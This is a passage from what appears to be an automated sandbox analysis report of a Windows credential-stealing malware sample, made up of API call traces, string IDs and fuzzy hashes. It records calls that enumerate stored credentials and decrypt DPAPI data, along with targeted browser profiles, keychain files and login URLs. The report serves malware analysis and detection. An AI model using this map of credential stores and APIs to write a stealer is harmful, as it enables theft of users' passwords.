                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                • API String ID: 2151808875-3798722523
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004127B2
                                • EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 004127B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                • String ID: $/deleteregkey$/savelangfile
                                • API String ID: 2744995895-28296030
                                • Opcode ID: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                • Opcode Fuzzy Hash: fcad638c039a134244896b453c320ca2d1027186d3b9ab8085e6916e84848b7d
                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040B71C
                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                • wcsrchr.MSVCRT ref: 0040B738
                                • memset.MSVCRT ref: 0040B756
                                • memset.MSVCRT ref: 0040B7F5
                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 0040B838
                                • memset.MSVCRT ref: 0040B851
                                • memset.MSVCRT ref: 0040B8CA
                                • memcmp.MSVCRT ref: 0040B9BF
                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                  • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                • memset.MSVCRT ref: 0040BB53
                                • memcpy.MSVCRT ref: 0040BB66
                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$File$Freewcsrchr$AddressChangeCloseCopyCreateCryptDataDeleteFindLibraryLocalNotificationProcUnprotectmemcmpmemcpywcscpy
                                • String ID: chp$v10
                                • API String ID: 580435826-2783969131
                                • Opcode ID: 5e147a3699f376e8ab633f9d09c5abb4e2fa433231be96269332ca0cffc53aec
                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                • Opcode Fuzzy Hash: 5e147a3699f376e8ab633f9d09c5abb4e2fa433231be96269332ca0cffc53aec
                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                  • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                  • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                  • Part of subcall function 0040DD85: FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                  • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                  • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                • DuplicateHandle.KERNEL32(?,00000104,00000000), ref: 0040E0BF
                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                • WriteFile.KERNEL32(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: File$CloseHandle$CreateProcess$CurrentTempView$??2@ChangeDirectoryDuplicateFindInformationMappingNameNotificationOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                • String ID: bhv
                                • API String ID: 3399910952-2689659898
                                • Opcode ID: 31268b28b02b0f0f5ddb4f3c3498909315dc08a91966dbcc90a29e268abf3bd7
                                • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                • Opcode Fuzzy Hash: 31268b28b02b0f0f5ddb4f3c3498909315dc08a91966dbcc90a29e268abf3bd7
                                • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                • API String ID: 2941347001-70141382
                                • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040C298
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                • wcschr.MSVCRT ref: 0040C324
                                • wcschr.MSVCRT ref: 0040C344
                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                • GetLastError.KERNEL32 ref: 0040C373
                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                • String ID: visited:
                                • API String ID: 2470578098-1702587658
                                • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                • memset.MSVCRT ref: 0040BC75
                                • memset.MSVCRT ref: 0040BC8C
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                • memcmp.MSVCRT ref: 0040BCD6
                                • memcpy.MSVCRT ref: 0040BD2B
                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                • String ID:
                                • API String ID: 509814883-3916222277
                                • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                • GetLastError.KERNEL32 ref: 0041847E
                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: CreateFile$??3@ErrorLast
                                • String ID: |A
                                • API String ID: 1407640353-1717621600
                                • Opcode ID: 909bfc9beb56609f0d98a45d83f95941f363312e1f875ee3b5f687390af7eeb7
                                • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                • Opcode Fuzzy Hash: 909bfc9beb56609f0d98a45d83f95941f363312e1f875ee3b5f687390af7eeb7
                                • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                • String ID: r!A
                                • API String ID: 2791114272-628097481
                                • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                • _wcslwr.MSVCRT ref: 0040C817
                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                • wcslen.MSVCRT ref: 0040C82C
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                • API String ID: 62308376-4196376884
                                • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 0040A824
                                • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                • wcscpy.MSVCRT ref: 0040A854
                                • wcscat.MSVCRT ref: 0040A86A
                                • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                • String ID: C:\Windows\system32
                                • API String ID: 669240632-2896066436
                                • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                • wcslen.MSVCRT ref: 0040BE06
                                • _wcsncoll.MSVCRT ref: 0040BE38
                                • memset.MSVCRT ref: 0040BE91
                                • memcpy.MSVCRT ref: 0040BEB2
                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                • wcschr.MSVCRT ref: 0040BF24
                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                • String ID:
                                • API String ID: 3191383707-0
                                • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00403CBF
                                • memset.MSVCRT ref: 00403CD4
                                • memset.MSVCRT ref: 00403CE9
                                • memset.MSVCRT ref: 00403CFE
                                • memset.MSVCRT ref: 00403D13
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 00403DDA
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                • String ID: Waterfox$Waterfox\Profiles
                                • API String ID: 4039892925-11920434
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00403E50
                                • memset.MSVCRT ref: 00403E65
                                • memset.MSVCRT ref: 00403E7A
                                • memset.MSVCRT ref: 00403E8F
                                • memset.MSVCRT ref: 00403EA4
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 00403F6B
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000016.00000002.472578546.0000000000459000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472598619.000000000045D000.00000040.00000001.sdmp
                                • Associated: 00000016.00000002.472609988.0000000000473000.00000040.00000001.sdmp
                                Similarity
                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                • API String ID: 4039892925-2068335096
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.MSVCRT ref: 00403FE1
                                • memset.MSVCRT ref: 00403FF6
                                • memset.MSVCRT ref: 0040400B
                                • memset.MSVCRT ref: 00404020
                                • memset.MSVCRT ref: 00404035
                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 004040FC
